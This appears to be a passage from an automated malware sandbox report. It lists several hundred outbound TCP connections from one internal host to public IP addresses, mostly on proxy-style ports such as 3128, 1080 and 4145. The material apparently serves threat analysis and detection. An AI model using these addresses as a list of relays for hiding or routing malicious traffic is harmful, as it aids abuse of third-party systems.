                  Source: global trafficTCP traffic: 192.168.2.5:49868 -> 103.107.84.124:8080
                  Source: global trafficTCP traffic: 192.168.2.5:49870 -> 45.188.166.52:1994
                  Source: global trafficTCP traffic: 192.168.2.5:49871 -> 72.10.160.93:25873
                  Source: global trafficTCP traffic: 192.168.2.5:49872 -> 69.27.150.166:5678
                  Source: global trafficTCP traffic: 192.168.2.5:49873 -> 185.136.151.252:5678
                  Source: global trafficTCP traffic: 192.168.2.5:49874 -> 103.55.33.59:8080
                  Source: global trafficTCP traffic: 192.168.2.5:49875 -> 162.241.158.204:59991
                  Source: global trafficTCP traffic: 192.168.2.5:49876 -> 148.72.209.174:4734
                  Source: global trafficTCP traffic: 192.168.2.5:49877 -> 167.172.158.55:8000
                  Source: global trafficTCP traffic: 192.168.2.5:49879 -> 103.115.227.201:8071
                  Source: global trafficTCP traffic: 192.168.2.5:49880 -> 117.70.49.235:8089
                  Source: global trafficTCP traffic: 192.168.2.5:49882 -> 178.176.134.67:3629
                  Source: global trafficTCP traffic: 192.168.2.5:49883 -> 148.66.130.53:23998
                  Source: global trafficTCP traffic: 192.168.2.5:49884 -> 103.35.189.217:1080
                  Source: global trafficTCP traffic: 192.168.2.5:49885 -> 159.89.238.138:8000
                  Source: global trafficTCP traffic: 192.168.2.5:49886 -> 67.22.28.62:8080
                  Source: global trafficTCP traffic: 192.168.2.5:49887 -> 178.128.156.219:8000
                  Source: global trafficTCP traffic: 192.168.2.5:49888 -> 41.223.232.117:3128
                  Source: global trafficTCP traffic: 192.168.2.5:49889 -> 20.24.43.214:8123
                  Source: global trafficTCP traffic: 192.168.2.5:49890 -> 162.241.137.197:36534
                  Source: global trafficTCP traffic: 192.168.2.5:49891 -> 188.132.222.167:8080
                  Source: global trafficTCP traffic: 192.168.2.5:49892 -> 103.76.172.230:4153
                  Source: global trafficTCP traffic: 192.168.2.5:49893 -> 51.15.230.100:16379
                  Source: global trafficTCP traffic: 192.168.2.5:49895 -> 173.212.209.49:44416
                  Source: global trafficTCP traffic: 192.168.2.5:49894 -> 103.146.170.193:83
                  Source: global trafficTCP traffic: 192.168.2.5:49896 -> 184.178.172.28:15294
                  Source: global trafficTCP traffic: 192.168.2.5:49897 -> 51.158.111.76:16379
                  Source: global trafficTCP traffic: 192.168.2.5:49899 -> 37.187.91.192:17605
                  Source: global trafficTCP traffic: 192.168.2.5:49900 -> 65.109.231.142:3128
                  Source: global trafficTCP traffic: 192.168.2.5:49902 -> 144.48.111.7:8674
                  Source: global trafficTCP traffic: 192.168.2.5:49904 -> 104.248.146.99:3128
                  Source: global trafficTCP traffic: 192.168.2.5:49905 -> 203.19.38.114:1080
                  Source: global trafficTCP traffic: 192.168.2.5:49906 -> 113.223.215.71:8089
                  Source: global trafficTCP traffic: 192.168.2.5:49907 -> 137.59.48.20:8080
                  Source: global trafficTCP traffic: 192.168.2.5:49908 -> 45.228.147.209:5678
                  Source: global trafficTCP traffic: 192.168.2.5:49909 -> 170.80.91.12:4145
                  Source: global trafficTCP traffic: 192.168.2.5:49910 -> 177.234.194.157:999
                  Source: global trafficTCP traffic: 192.168.2.5:49912 -> 91.203.114.71:38838
                  Source: global trafficTCP traffic: 192.168.2.5:49913 -> 171.22.108.188:3128
                  Source: global trafficTCP traffic: 192.168.2.5:49914 -> 200.55.249.135:8080
                  Source: global trafficTCP traffic: 192.168.2.5:49915 -> 223.18.60.191:8080
                  Source: global trafficTCP traffic: 192.168.2.5:49916 -> 114.106.134.37:8089
                  Source: global trafficTCP traffic: 192.168.2.5:49918 -> 41.217.223.145:32650
                  Source: global trafficTCP traffic: 192.168.2.5:49917 -> 103.233.2.90:4893
                  Source: global trafficTCP traffic: 192.168.2.5:49919 -> 186.103.130.93:8080
                  Source: global trafficTCP traffic: 192.168.2.5:49920 -> 107.180.88.173:59820
                  Source: global trafficTCP traffic: 192.168.2.5:49922 -> 162.0.220.220:23924
                  Source: global trafficTCP traffic: 192.168.2.5:49924 -> 36.75.16.40:4153
                  Source: global trafficTCP traffic: 192.168.2.5:49928 -> 190.14.5.162:5678
                  Source: global trafficTCP traffic: 192.168.2.5:49930 -> 98.162.25.23:4145
                  Source: global trafficTCP traffic: 192.168.2.5:49931 -> 162.214.121.173:64579
                  Source: global trafficTCP traffic: 192.168.2.5:49932 -> 43.133.71.20:15673
                  Source: global trafficTCP traffic: 192.168.2.5:49933 -> 161.132.125.244:8080
                  Source: global trafficTCP traffic: 192.168.2.5:49935 -> 119.47.90.45:8080
                  Source: global trafficTCP traffic: 192.168.2.5:49937 -> 181.209.78.78:999
                  Source: global trafficTCP traffic: 192.168.2.5:49938 -> 119.18.146.114:5020
                  Source: global trafficTCP traffic: 192.168.2.5:49939 -> 103.153.136.10:8080
                  Source: global trafficTCP traffic: 192.168.2.5:49940 -> 168.227.158.1:4145
                  Source: global trafficTCP traffic: 192.168.2.5:49941 -> 138.36.86.237:5678
                  Source: global trafficTCP traffic: 192.168.2.5:49942 -> 177.136.84.200:999
                  Source: global trafficTCP traffic: 192.168.2.5:49943 -> 65.1.244.232:1080
                  Source: global trafficTCP traffic: 192.168.2.5:49944 -> 179.99.202.210:4153
                  Source: global trafficTCP traffic: 192.168.2.5:49945 -> 49.145.119.102:8085
                  Source: global trafficTCP traffic: 192.168.2.5:49947 -> 38.156.75.14:8080
                  Source: global trafficTCP traffic: 192.168.2.5:49948 -> 170.246.85.106:50991
                  Source: global trafficTCP traffic: 192.168.2.5:49949 -> 67.43.228.253:18753
                  Source: global trafficTCP traffic: 192.168.2.5:49950 -> 193.200.151.158:8192
                  Source: global trafficTCP traffic: 192.168.2.5:49951 -> 103.121.39.158:1080
                  Source: global trafficTCP traffic: 192.168.2.5:49952 -> 176.241.143.197:8080
                  Source: global trafficTCP traffic: 192.168.2.5:49954 -> 103.159.92.34:3125
                  Source: global trafficTCP traffic: 192.168.2.5:49955 -> 5.58.239.210:8080
                  Source: global trafficTCP traffic: 192.168.2.5:49956 -> 82.62.241.62:3128
                  Source: global trafficTCP traffic: 192.168.2.5:49957 -> 185.23.118.252:53701
                  Source: global trafficTCP traffic: 192.168.2.5:49959 -> 177.230.183.185:10101
                  Source: global trafficTCP traffic: 192.168.2.5:49960 -> 51.79.87.144:30464
                  Source: global trafficTCP traffic: 192.168.2.5:49961 -> 202.191.123.195:8090
                  Source: global trafficTCP traffic: 192.168.2.5:49958 -> 47.236.36.58:8888
                  Source: global trafficTCP traffic: 192.168.2.5:49962 -> 38.7.18.102:8080
                  Source: global trafficTCP traffic: 192.168.2.5:49963 -> 45.230.51.130:999
                  Source: global trafficTCP traffic: 192.168.2.5:49965 -> 38.91.107.220:34357
                  Source: global trafficTCP traffic: 192.168.2.5:49966 -> 103.127.38.46:1080
                  Source: global trafficTCP traffic: 192.168.2.5:49967 -> 104.165.169.8:3128
                  Source: global trafficTCP traffic: 192.168.2.5:49968 -> 181.212.41.171:999
                  Source: global trafficTCP traffic: 192.168.2.5:49969 -> 190.109.72.10:33633
                  Source: global trafficTCP traffic: 192.168.2.5:49970 -> 51.222.241.157:22538
                  Source: global trafficTCP traffic: 192.168.2.5:49971 -> 158.51.210.75:7777
                  Source: global trafficTCP traffic: 192.168.2.5:49973 -> 61.7.143.93:8180
                  Source: global trafficTCP traffic: 192.168.2.5:49974 -> 42.49.148.167:9001
                  Source: global trafficTCP traffic: 192.168.2.5:49975 -> 210.5.10.87:53281
                  Source: global trafficTCP traffic: 192.168.2.5:49976 -> 128.199.104.93:8000
                  Source: global trafficTCP traffic: 192.168.2.5:49977 -> 132.148.167.243:17702
                  Source: global trafficTCP traffic: 192.168.2.5:49978 -> 165.227.196.37:53718
                  Source: global trafficTCP traffic: 192.168.2.5:49981 -> 8.243.162.242:999
                  Source: global trafficTCP traffic: 192.168.2.5:49983 -> 38.162.4.242:3128
                  Source: global trafficTCP traffic: 192.168.2.5:49980 -> 128.199.202.122:3128
                  Source: global trafficTCP traffic: 192.168.2.5:49984 -> 190.69.157.213:999
                  Source: global trafficTCP traffic: 192.168.2.5:49985 -> 36.64.22.18:8199
                  Source: global trafficTCP traffic: 192.168.2.5:49986 -> 72.210.252.137:4145
                  Source: global trafficTCP traffic: 192.168.2.5:49989 -> 92.204.134.38:9375
                  Source: global trafficTCP traffic: 192.168.2.5:49990 -> 62.122.201.246:50129
                  Source: global trafficTCP traffic: 192.168.2.5:49991 -> 132.148.6.255:20859
                  Source: global trafficTCP traffic: 192.168.2.5:49992 -> 159.223.166.21:47460
                  Source: global trafficTCP traffic: 192.168.2.5:49993 -> 50.113.36.155:8080
                  Source: global trafficTCP traffic: 192.168.2.5:49995 -> 110.93.227.28:3128
                  Source: global trafficTCP traffic: 192.168.2.5:49996 -> 203.95.198.146:8080
                  Source: global trafficTCP traffic: 192.168.2.5:49998 -> 212.192.31.37:3128
                  Source: global trafficTCP traffic: 192.168.2.5:49999 -> 103.111.219.245:4145
                  Source: global trafficTCP traffic: 192.168.2.5:50000 -> 66.228.35.209:44809
                  Source: global trafficTCP traffic: 192.168.2.5:50001 -> 41.65.236.37:1981
                  Source: global trafficTCP traffic: 192.168.2.5:50007 -> 67.43.236.20:8209
                  Source: global trafficTCP traffic: 192.168.2.5:50008 -> 178.115.230.243:8080
                  Source: global trafficTCP traffic: 192.168.2.5:50010 -> 191.53.112.170:45619
                  Source: global trafficTCP traffic: 192.168.2.5:50011 -> 47.56.110.204:8989
                  Source: global trafficTCP traffic: 192.168.2.5:50012 -> 154.0.14.116:3128
                  Source: global trafficTCP traffic: 192.168.2.5:50013 -> 123.182.59.109:8089
                  Source: global trafficTCP traffic: 192.168.2.5:50014 -> 140.227.61.156:23456
                  Source: global trafficTCP traffic: 192.168.2.5:50016 -> 146.59.18.246:29066
                  Source: global trafficTCP traffic: 192.168.2.5:50017 -> 212.50.19.150:4153
                  Source: global trafficTCP traffic: 192.168.2.5:50018 -> 161.97.147.193:2838
                  Source: global trafficTCP traffic: 192.168.2.5:50020 -> 91.134.140.160:51513
                  Source: global trafficTCP traffic: 192.168.2.5:50021 -> 162.214.225.223:36129
                  Source: global trafficTCP traffic: 192.168.2.5:50024 -> 36.66.36.252:4153
                  Source: global trafficTCP traffic: 192.168.2.5:50025 -> 20.219.177.73:3129
                  Source: global trafficTCP traffic: 192.168.2.5:50027 -> 46.100.106.242:6030
                  Source: global trafficTCP traffic: 192.168.2.5:50028 -> 184.178.172.18:15280
                  Source: global trafficTCP traffic: 192.168.2.5:50029 -> 159.192.232.226:52335
                  Source: global trafficTCP traffic: 192.168.2.5:50030 -> 188.132.222.23:8080
                  Source: global trafficTCP traffic: 192.168.2.5:50031 -> 142.11.215.30:8080
                  Source: global trafficTCP traffic: 192.168.2.5:50032 -> 190.120.249.6:999
                  Source: global trafficTCP traffic: 192.168.2.5:50033 -> 197.155.237.74:8111
                  Source: global trafficTCP traffic: 192.168.2.5:50034 -> 91.148.127.162:8080
                  Source: global trafficTCP traffic: 192.168.2.5:50036 -> 125.87.84.46:8089
                  Source: global trafficTCP traffic: 192.168.2.5:50037 -> 159.203.61.169:3128
                  Source: global trafficTCP traffic: 192.168.2.5:50038 -> 82.65.240.111:3128
                  Source: global trafficTCP traffic: 192.168.2.5:50039 -> 93.190.142.57:41890
                  Source: global trafficTCP traffic: 192.168.2.5:50040 -> 200.199.195.138:4145
                  Source: global trafficTCP traffic: 192.168.2.5:50041 -> 62.182.114.164:59623
                  Source: global trafficTCP traffic: 192.168.2.5:50042 -> 161.97.173.42:5379
                  Source: global trafficTCP traffic: 192.168.2.5:50043 -> 190.217.69.203:999
                  Source: global trafficTCP traffic: 192.168.2.5:50045 -> 103.116.174.125:5678
                  Source: global trafficTCP traffic: 192.168.2.5:50046 -> 190.110.99.189:999
                  Source: global trafficTCP traffic: 192.168.2.5:50047 -> 114.6.25.5:65432
                  Source: global trafficTCP traffic: 192.168.2.5:50048 -> 185.219.133.106:3128
                  Source: global trafficTCP traffic: 192.168.2.5:50049 -> 38.162.28.61:3128
                  Source: global trafficTCP traffic: 192.168.2.5:50050 -> 46.173.35.229:3629
                  Source: global trafficTCP traffic: 192.168.2.5:50052 -> 122.129.112.209:4145
                  Source: global trafficTCP traffic: 192.168.2.5:50053 -> 208.87.131.240:41368
                  Source: global trafficTCP traffic: 192.168.2.5:50055 -> 85.102.10.94:4153
                  Source: global trafficTCP traffic: 192.168.2.5:50056 -> 103.79.96.141:4153
                  Source: global trafficTCP traffic: 192.168.2.5:50057 -> 37.120.222.132:3128
                  Source: global trafficTCP traffic: 192.168.2.5:50058 -> 88.202.230.103:17045
                  Source: global trafficTCP traffic: 192.168.2.5:50059 -> 195.178.33.86:8080
                  Source: global trafficTCP traffic: 192.168.2.5:50002 -> 181.115.75.102:5678
                  Source: global trafficTCP traffic: 192.168.2.5:50060 -> 167.99.55.197:3128
                  Source: global trafficTCP traffic: 192.168.2.5:50062 -> 103.165.155.68:1111
                  Source: global trafficTCP traffic: 192.168.2.5:50063 -> 51.38.63.124:27294
                  Source: global trafficTCP traffic: 192.168.2.5:50064 -> 14.115.107.232:3629
                  Source: global trafficTCP traffic: 192.168.2.5:50065 -> 92.241.66.138:4145
                  Source: global trafficTCP traffic: 192.168.2.5:50066 -> 3.122.84.99:3128
                  Source: global trafficTCP traffic: 192.168.2.5:50067 -> 159.65.39.234:7732
                  Source: global trafficTCP traffic: 192.168.2.5:50069 -> 92.118.132.125:8080
                  Source: global trafficTCP traffic: 192.168.2.5:50070 -> 62.112.11.204:26431
                  Source: global trafficTCP traffic: 192.168.2.5:50072 -> 185.128.153.10:8080
                  Source: global trafficTCP traffic: 192.168.2.5:50074 -> 46.209.100.252:5678
                  Source: global trafficTCP traffic: 192.168.2.5:50075 -> 37.52.50.28:5678
                  Source: global trafficTCP traffic: 192.168.2.5:50076 -> 45.70.236.121:8080
                  Source: global trafficTCP traffic: 192.168.2.5:50077 -> 107.152.98.5:4145
                  Source: global trafficTCP traffic: 192.168.2.5:50078 -> 91.199.93.32:4153
                  Source: global trafficTCP traffic: 192.168.2.5:50079 -> 171.243.25.220:31350
                  Source: global trafficTCP traffic: 192.168.2.5:50080 -> 223.206.142.49:8080
                  Source: global trafficTCP traffic: 192.168.2.5:50083 -> 103.186.90.18:8080
                  Source: global trafficTCP traffic: 192.168.2.5:50086 -> 101.255.140.1:8090
                  Source: global trafficTCP traffic: 192.168.2.5:50088 -> 5.34.201.244:3128
                  Source: global trafficTCP traffic: 192.168.2.5:50089 -> 107.180.90.88:62908
                  Source: global trafficTCP traffic: 192.168.2.5:50085 -> 206.42.40.0:5678
                  Source: global trafficTCP traffic: 192.168.2.5:50091 -> 189.203.181.34:8080
                  Source: global trafficTCP traffic: 192.168.2.5:50093 -> 103.216.51.36:32650
                  Source: global trafficTCP traffic: 192.168.2.5:50094 -> 67.43.228.251:5999
                  Source: global trafficTCP traffic: 192.168.2.5:50097 -> 103.156.140.237:8080
                  Source: global trafficTCP traffic: 192.168.2.5:50099 -> 51.161.131.84:49202
                  Source: global trafficTCP traffic: 192.168.2.5:50101 -> 190.104.20.85:8080
                  Source: global trafficTCP traffic: 192.168.2.5:50102 -> 18.134.236.231:3128
                  Source: global trafficTCP traffic: 192.168.2.5:50103 -> 159.223.71.71:51187
                  Source: global trafficTCP traffic: 192.168.2.5:50104 -> 190.138.250.48:3629
                  Source: global trafficTCP traffic: 192.168.2.5:50105 -> 113.99.188.254:4153
                  Source: global trafficTCP traffic: 192.168.2.5:50107 -> 183.96.235.105:18572
                  Source: global trafficTCP traffic: 192.168.2.5:50108 -> 37.187.77.58:13412
                  Source: global trafficTCP traffic: 192.168.2.5:50109 -> 38.52.222.254:999
                  Source: global trafficTCP traffic: 192.168.2.5:50110 -> 1.20.220.79:4145
                  Source: global trafficTCP traffic: 192.168.2.5:50111 -> 154.79.254.236:32650
                  Source: global trafficTCP traffic: 192.168.2.5:50113 -> 46.101.102.134:3128
                  Source: global trafficTCP traffic: 192.168.2.5:50114 -> 203.96.177.211:55005
                  Source: global trafficTCP traffic: 192.168.2.5:50115 -> 103.165.155.163:1111
                  Source: global trafficTCP traffic: 192.168.2.5:50116 -> 94.177.106.178:2324
                  Source: global trafficTCP traffic: 192.168.2.5:50117 -> 160.153.245.187:59786
                  Source: global trafficTCP traffic: 192.168.2.5:50118 -> 103.167.68.255:8080
                  Source: global trafficTCP traffic: 192.168.2.5:50119 -> 160.251.6.106:10008
                  Source: global trafficTCP traffic: 192.168.2.5:50120 -> 144.76.92.16:14618
                  Source: global trafficTCP traffic: 192.168.2.5:50121 -> 213.6.155.9:19000
                  Source: global trafficTCP traffic: 192.168.2.5:50123 -> 94.247.241.70:53640
                  Source: global trafficTCP traffic: 192.168.2.5:50124 -> 175.100.91.151:8080
                  Source: global trafficTCP traffic: 192.168.2.5:50125 -> 103.148.130.5:8080
                  Source: global trafficTCP traffic: 192.168.2.5:50127 -> 144.91.66.30:51110
                  Source: global trafficTCP traffic: 192.168.2.5:50128 -> 201.77.108.64:999
                  Source: global trafficTCP traffic: 192.168.2.5:50129 -> 184.185.2.12:4145
                  Source: global trafficTCP traffic: 192.168.2.5:50130 -> 94.23.83.53:55806
                  Source: global trafficTCP traffic: 192.168.2.5:50131 -> 198.12.255.193:9375
                  Source: global trafficTCP traffic: 192.168.2.5:50132 -> 160.248.80.91:8080
                  Source: global trafficTCP traffic: 192.168.2.5:50133 -> 162.240.39.58:45840
                  Source: global trafficTCP traffic: 192.168.2.5:50136 -> 38.54.95.19:9080
                  Source: global trafficTCP traffic: 192.168.2.5:50137 -> 199.102.106.94:4145
                  Source: global trafficTCP traffic: 192.168.2.5:50138 -> 103.85.114.249:8080
                  Source: global trafficTCP traffic: 192.168.2.5:50139 -> 184.181.217.220:4145
                  Source: global trafficTCP traffic: 192.168.2.5:50140 -> 222.124.177.148:7497
                  Source: global trafficTCP traffic: 192.168.2.5:50141 -> 185.236.202.170:3128
                  Source: global trafficTCP traffic: 192.168.2.5:50143 -> 95.142.40.99:42140
                  Source: global trafficTCP traffic: 192.168.2.5:50144 -> 155.185.15.56:3128
                  Source: global trafficTCP traffic: 192.168.2.5:50145 -> 103.19.129.137:83
                  Source: global trafficTCP traffic: 192.168.2.5:50146 -> 143.202.97.171:999
                  Source: global trafficTCP traffic: 192.168.2.5:50147 -> 45.4.252.217:999
                  Source: global trafficTCP traffic: 192.168.2.5:50148 -> 103.255.147.102:83
                  Source: global trafficTCP traffic: 192.168.2.5:50149 -> 124.158.186.254:8080
                  Source: global trafficTCP traffic: 192.168.2.5:50151 -> 186.215.87.194:6000
                  Source: global trafficTCP traffic: 192.168.2.5:50152 -> 20.204.212.45:3129
                  Source: global trafficTCP traffic: 192.168.2.5:50153 -> 165.227.104.122:29992
                  Source: global trafficTCP traffic: 192.168.2.5:50155 -> 118.99.108.4:8080
                  Source: global trafficTCP traffic: 192.168.2.5:50156 -> 45.70.237.139:4145
                  Source: global trafficTCP traffic: 192.168.2.5:50157 -> 68.1.210.163:4145
                  Source: global trafficTCP traffic: 192.168.2.5:50158 -> 179.108.209.63:8080
                  Source: global trafficTCP traffic: 192.168.2.5:50159 -> 66.29.129.54:47036
                  Source: global trafficTCP traffic: 192.168.2.5:50160 -> 46.28.111.54:1080
                  Source: global trafficTCP traffic: 192.168.2.5:50161 -> 190.211.5.232:999
                  Source: global trafficTCP traffic: 192.168.2.5:50164 -> 39.74.195.25:9000
                  Source: global trafficTCP traffic: 192.168.2.5:50165 -> 180.241.249.131:8080
                  Source: global trafficTCP traffic: 192.168.2.5:50167 -> 85.214.249.84:3128
                  Source: global trafficTCP traffic: 192.168.2.5:50168 -> 197.234.121.222:8291
                  Source: global trafficTCP traffic: 192.168.2.5:50169 -> 185.65.205.171:8080
                  Source: global trafficTCP traffic: 192.168.2.5:50170 -> 197.234.13.14:4145
                  Source: global trafficTCP traffic: 192.168.2.5:50172 -> 110.76.129.30:5678
                  Source: global trafficTCP traffic: 192.168.2.5:50176 -> 185.189.112.157:3128
                  Source: global trafficTCP traffic: 192.168.2.5:50177 -> 103.79.96.218:4153
                  Source: global trafficTCP traffic: 192.168.2.5:50181 -> 45.118.132.180:45449
                  Source: global trafficTCP traffic: 192.168.2.5:50182 -> 41.33.203.235:1976
                  Source: global trafficTCP traffic: 192.168.2.5:50183 -> 193.8.87.43:4444
                  Source: global trafficTCP traffic: 192.168.2.5:50184 -> 180.183.3.79:8080
                  Source: global trafficTCP traffic: 192.168.2.5:50185 -> 45.162.132.1:999
                  Source: global trafficTCP traffic: 192.168.2.5:50186 -> 54.223.158.88:8080
                  Source: global trafficTCP traffic: 192.168.2.5:50189 -> 142.54.239.1:4145
                  Source: global trafficTCP traffic: 192.168.2.5:50188 -> 164.92.86.113:54597
                  Source: global trafficTCP traffic: 192.168.2.5:50190 -> 142.54.235.9:4145
                  Source: global trafficTCP traffic: 192.168.2.5:50191 -> 194.233.78.142:35513
                  Source: global trafficTCP traffic: 192.168.2.5:50192 -> 103.153.135.100:8083
                  Source: global trafficTCP traffic: 192.168.2.5:50193 -> 162.241.46.6:62244
                  Source: global trafficTCP traffic: 192.168.2.5:50195 -> 91.92.80.199:4145
                  Source: global trafficTCP traffic: 192.168.2.5:50196 -> 163.172.166.35:16379
                  Source: global trafficTCP traffic: 192.168.2.5:50197 -> 162.214.102.195:34227
                  Source: global trafficTCP traffic: 192.168.2.5:50199 -> 92.241.92.218:14888
                  Source: global trafficTCP traffic: 192.168.2.5:50200 -> 45.230.39.123:999
                  Source: global trafficTCP traffic: 192.168.2.5:50202 -> 36.93.138.75:5678
                  Source: global trafficTCP traffic: 192.168.2.5:50203 -> 103.76.12.58:3128
                  Source: global trafficTCP traffic: 192.168.2.5:50204 -> 188.132.222.12:8080
                  Source: global trafficTCP traffic: 192.168.2.5:50205 -> 154.239.9.94:8080
                  Source: global trafficTCP traffic: 192.168.2.5:50207 -> 162.210.192.136:57403
                  Source: global trafficTCP traffic: 192.168.2.5:50209 -> 72.10.160.172:27283
                  Source: global trafficTCP traffic: 192.168.2.5:50210 -> 209.14.112.5:1080
                  Source: global trafficTCP traffic: 192.168.2.5:50198 -> 165.22.96.68:3128
                  Source: global trafficTCP traffic: 192.168.2.5:50208 -> 103.63.190.37:8080
                  Source: global trafficTCP traffic: 192.168.2.5:50212 -> 27.145.61.163:8080
                  Source: global trafficTCP traffic: 192.168.2.5:50213 -> 103.247.216.70:8080
                  Source: global trafficTCP traffic: 192.168.2.5:50217 -> 47.88.3.19:8080
                  Source: global trafficTCP traffic: 192.168.2.5:50219 -> 124.160.118.183:8080
                  Source: global trafficTCP traffic: 192.168.2.5:50220 -> 62.171.131.101:35006
                  Source: global trafficTCP traffic: 192.168.2.5:50223 -> 37.187.73.7:23637
                  Source: global trafficTCP traffic: 192.168.2.5:50225 -> 186.251.255.93:31337
                  Source: global trafficTCP traffic: 192.168.2.5:50226 -> 186.226.171.94:1080
                  Source: global trafficTCP traffic: 192.168.2.5:50229 -> 50.250.205.21:32100
                  Source: global trafficTCP traffic: 192.168.2.5:50230 -> 38.162.25.44:3128
                  Source: global trafficTCP traffic: 192.168.2.5:50231 -> 103.144.209.104:3629
                  Source: global trafficTCP traffic: 192.168.2.5:50232 -> 47.245.56.108:18181
                  Source: global trafficTCP traffic: 192.168.2.5:50234 -> 51.158.77.220:16379
                  Source: global trafficTCP traffic: 192.168.2.5:50235 -> 103.245.109.172:8080
                  Source: global trafficTCP traffic: 192.168.2.5:50237 -> 154.79.246.18:9898
                  Source: global trafficTCP traffic: 192.168.2.5:50239 -> 201.157.254.26:8080
                  Source: global trafficTCP traffic: 192.168.2.5:50240 -> 123.182.59.164:8089
                  Source: global trafficTCP traffic: 192.168.2.5:50242 -> 36.95.48.45:1080
                  Source: global trafficTCP traffic: 192.168.2.5:50244 -> 171.244.140.160:24015
                  Source: global trafficTCP traffic: 192.168.2.5:50245 -> 109.238.208.138:21231
                  Source: global trafficTCP traffic: 192.168.2.5:50246 -> 196.251.222.234:8104
                  Source: global trafficTCP traffic: 192.168.2.5:50247 -> 31.24.44.92:52173
                  Source: global trafficTCP traffic: 192.168.2.5:50248 -> 117.160.250.130:8899
                  Source: global trafficTCP traffic: 192.168.2.5:50250 -> 195.74.72.111:5678
                  Source: global trafficTCP traffic: 192.168.2.5:50251 -> 125.99.106.250:3128
                  Source: global trafficTCP traffic: 192.168.2.5:50252 -> 103.105.55.170:8085
                  Source: global trafficTCP traffic: 192.168.2.5:50253 -> 38.162.29.125:3128
                  Source: global trafficTCP traffic: 192.168.2.5:50255 -> 46.226.148.105:36366
                  Source: global trafficTCP traffic: 192.168.2.5:50256 -> 103.79.96.217:4153
                  Source: global trafficTCP traffic: 192.168.2.5:50257 -> 212.102.103.133:4153
                  Source: global trafficTCP traffic: 192.168.2.5:50258 -> 14.56.98.15:3128
                  Source: global trafficTCP traffic: 192.168.2.5:50259 -> 31.170.19.241:4153
                  Source: global trafficTCP traffic: 192.168.2.5:50261 -> 207.180.234.220:48963
                  Source: global trafficTCP traffic: 192.168.2.5:50263 -> 148.101.163.165:8080
                  Source: global trafficTCP traffic: 192.168.2.5:50265 -> 138.97.37.115:8189
                  Source: global trafficTCP traffic: 192.168.2.5:50266 -> 176.99.2.43:1081
                  Source: global trafficTCP traffic: 192.168.2.5:50267 -> 41.70.12.54:5678
                  Source: global trafficTCP traffic: 192.168.2.5:50268 -> 5.10.249.159:1080
                  Source: global trafficTCP traffic: 192.168.2.5:50271 -> 103.47.93.194:1080
                  Source: global trafficTCP traffic: 192.168.2.5:50272 -> 103.82.11.209:4153
                  Source: global trafficTCP traffic: 192.168.2.5:50273 -> 62.89.9.10:8080
                  Source: global trafficTCP traffic: 192.168.2.5:50274 -> 139.99.197.2:3128
                  Source: global trafficTCP traffic: 192.168.2.5:50275 -> 20.204.214.79:3129
                  Source: global trafficTCP traffic: 192.168.2.5:50276 -> 36.91.98.115:8181
                  Source: global trafficTCP traffic: 192.168.2.5:50278 -> 202.153.233.228:8080
                  Source: global trafficTCP traffic: 192.168.2.5:50280 -> 103.35.190.18:3128
                  Source: global trafficTCP traffic: 192.168.2.5:50281 -> 128.199.221.91:21605
                  Source: global trafficTCP traffic: 192.168.2.5:50282 -> 178.212.51.166:33333
                  Source: global trafficTCP traffic: 192.168.2.5:50283 -> 184.178.172.23:4145
                  Source: global trafficTCP traffic: 192.168.2.5:50284 -> 51.158.105.107:16379
                  Source: global trafficTCP traffic: 192.168.2.5:50285 -> 117.84.165.182:1080
                  Source: global trafficTCP traffic: 192.168.2.5:50287 -> 183.91.80.194:8089
                  Source: global trafficTCP traffic: 192.168.2.5:50289 -> 103.102.219.25:44550
                  Source: global trafficTCP traffic: 192.168.2.5:50291 -> 72.195.34.42:4145
                  Source: global trafficTCP traffic: 192.168.2.5:50292 -> 93.157.248.108:88
                  Source: global trafficTCP traffic: 192.168.2.5:50294 -> 51.81.186.179:58630
                  Source: global trafficTCP traffic: 192.168.2.5:50297 -> 38.41.0.60:11201
                  Source: global trafficTCP traffic: 192.168.2.5:50298 -> 182.52.229.165:8080
                  Source: global trafficTCP traffic: 192.168.2.5:50299 -> 105.234.156.109:4145
                  Source: global trafficTCP traffic: 192.168.2.5:50301 -> 203.160.57.87:5678
                  Source: global trafficTCP traffic: 192.168.2.5:50302 -> 185.200.37.245:8080
                  Source: global trafficTCP traffic: 192.168.2.5:50303 -> 111.9.49.190:8060
                  Source: global trafficTCP traffic: 192.168.2.5:50304 -> 212.5.193.219:8880
                  Source: global trafficTCP traffic: 192.168.2.5:50306 -> 151.236.39.7:57248
                  Source: global trafficTCP traffic: 192.168.2.5:50307 -> 20.219.182.59:3129
                  Source: global trafficTCP traffic: 192.168.2.5:50308 -> 83.53.207.196:4145
                  Source: global trafficTCP traffic: 192.168.2.5:50309 -> 72.167.38.7:45650
                  Source: global trafficTCP traffic: 192.168.2.5:50313 -> 103.155.166.149:8181
                  Source: global trafficTCP traffic: 192.168.2.5:50315 -> 104.165.127.146:3128
                  Source: global trafficTCP traffic: 192.168.2.5:50317 -> 177.242.201.5:999
                  Source: global trafficTCP traffic: 192.168.2.5:50318 -> 103.206.208.135:55443
                  Source: global trafficTCP traffic: 192.168.2.5:50319 -> 132.148.245.55:22508
                  Source: global trafficTCP traffic: 192.168.2.5:50321 -> 5.78.89.192:8080
                  Source: global trafficTCP traffic: 192.168.2.5:50324 -> 148.72.212.198:3950
                  Source: global trafficTCP traffic: 192.168.2.5:50325 -> 41.65.227.98:1981
                  Source: global trafficTCP traffic: 192.168.2.5:50327 -> 203.218.172.225:8080
                  Source: global trafficTCP traffic: 192.168.2.5:50331 -> 96.70.52.227:48324
                  Source: global trafficTCP traffic: 192.168.2.5:50333 -> 92.205.61.38:36073
                  Source: global trafficTCP traffic: 192.168.2.5:50334 -> 190.120.249.149:4145
                  Source: global trafficTCP traffic: 192.168.2.5:50336 -> 101.230.172.86:9443
                  Source: global trafficTCP traffic: 192.168.2.5:50339 -> 138.197.38.62:20220
                  Source: global trafficTCP traffic: 192.168.2.5:50341 -> 168.205.100.36:8080
                  Source: global trafficTCP traffic: 192.168.2.5:50342 -> 101.255.166.134:1111
                  Source: global trafficTCP traffic: 192.168.2.5:50343 -> 67.213.212.56:51774
                  Source: global trafficTCP traffic: 192.168.2.5:50344 -> 115.79.26.196:1080
                  Source: global trafficTCP traffic: 192.168.2.5:50345 -> 65.1.40.47:1080
                  Source: global trafficTCP traffic: 192.168.2.5:50346 -> 82.137.245.41:1080
                  Source: global trafficTCP traffic: 192.168.2.5:50349 -> 37.148.217.234:999
                  Source: global trafficTCP traffic: 192.168.2.5:50352 -> 31.172.66.22:20466
                  Source: global trafficTCP traffic: 192.168.2.5:50354 -> 209.14.112.4:1080
